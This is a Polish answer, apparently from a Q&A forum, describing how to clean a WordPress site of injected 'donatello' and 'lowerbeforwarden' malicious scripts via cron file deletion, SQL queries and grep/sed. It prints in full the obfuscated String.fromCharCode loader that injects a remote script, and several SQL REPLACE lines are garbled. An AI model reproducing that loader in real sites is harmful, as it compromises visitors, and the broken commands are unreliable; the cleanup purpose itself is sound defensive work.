mysql — Jak zbiorczo usunąć określoną część wszystkich postów w wordpress
To jest moja lista poleceń dla linux centos:
1. usuń złośliwe skrypty
find /var/www/ -type f -name "_a" -exec rm -f "{}" +;
find /var/www/ -type f -name "_t" -exec rm -f "{}" +;
Umieść to polecenie w cron, aby utrzymać serwer w czystości (usuwaj złośliwe pliki co 15 minut, jeśli znajdują się na serwerze):
# execute every 15 minutes
*/15 * * * * find /var/www/ -type f -name "rms_unique_wp_mu_pl_fl_nm.php" -exec rm -f "{}" +; find /var/www/ -type f -name "rms-script-ini.php" -exec rm -f "{}" +; find /var/www/ -type f -name "rms-script-mu-plugin.php" -exec rm -f "{}" +; find /var/www/ -type f -name "_a" -exec rm -f "{}" +; find /var/www/ -type f -name "_t" -exec rm -f "{}" +;
2. wyczyść pamięć podręczną wtyczki WP
3. wyczyść db
użyj tego zapytania sql
#check affected records
SELECT * FROM wp_posts WHERE post_content LIKE "%donatello%";
SELECT * FROM wp_posts WHERE post_content LIKE "%blackwater%";
SELECT * FROM wp_options WHERE option_value LIKE "%donatello%";
SELECT * FROM wp_options WHERE option_value LIKE "%blackwater%";
SELECT * FROM wp_posts WHERE post_content LIKE "%directednotconverted%";
SELECT * FROM wp_options WHERE option_value LIKE "%directednotconverted%";
SELECT * FROM wp_posts WHERE post_content LIKE "%lowerbeforwarden%";
SELECT * FROM wp_options WHERE option_value LIKE "%lowerbeforwarden%";
#clean db
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src=" type="text/javascript"></script>", ''));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script type="text/javascript" src=" ''));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src=" type="text/javascript"></script>", ''));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src=""" type=""text/javascript""></script>", ''));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src=" type="text/javascript"></script>", ''));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src=""" type=""text/javascript""></script>", ''));
#recheck if all is clean
SELECT * FROM wp_posts WHERE post_content LIKE "%donatello%";
SELECT * FROM wp_posts WHERE post_content LIKE "%blackwater%";
SELECT * FROM wp_options WHERE option_value LIKE "%donatello%";
SELECT * FROM wp_options WHERE option_value LIKE "%blackwater%";
SELECT * FROM wp_posts WHERE post_content LIKE "%directednotconverted%";
SELECT * FROM wp_options WHERE option_value LIKE "%directednotconverted%";
SELECT * FROM wp_posts WHERE post_content LIKE "%lowerbeforwarden%";
SELECT * FROM wp_options WHERE option_value LIKE "%lowerbeforwarden%"
4. sprawdź i wyczyść szkodliwy kod w pliku
sprawdź kod malicios w postaci zwykłego tekstu:
cd /var/www
grep -rlF "donatello"
grep -rlF "blackwater"
grep -rlF "lowerbeforwarden"
czysty kod wstrzyknięty jako zwykły tekst:
grep -rlF "donatello" | xargs sed -i "s/<script type="text\/javascript" src="https:\/\/js.donatelloflowfirstly.ga\/statistics.js?n=nb5"><\/script>//g"
grep -rlF "lowerbeforwarden" | xargs sed -i "s/<script type="text\/javascript" src="https:\/\/scripts.lowerbeforwarden.ml\/src.js?n=nb5"><\/script>//g"
sprawdź zaszyfrowany kod malicios, jeśli konwertujesz ciąg liczbowy
String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115)
w utf8 zobaczy:
h,t,t,p,s,:,/,/,s,c,r,i,p,t,s,.,l,o,w,e,r,b,e,f,o,r,w,a,r,d,e,n,.,m,l,/,s,r,c,.,j,s
znalazłem kod:
grep -rlF "String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115)"
usuń kod:
grep -rlF "String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115)" | xargs sed -i "s/<script type=text\/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))\[0\]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0\]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0\].appendChild(elem);})();<\/script>//g"
grep -rlF "String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115)" | xargs sed -i "s/Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))\[0\]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0\]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0\].appendChild(elem);})();//g"
Ostatni zaszyfrowany ciąg jest powiązany z wariantem „lowerbeforwarden”. Użyj odpowiedniej kolejności dla „donatello”.
Mam nadzieję, że to pomoże.
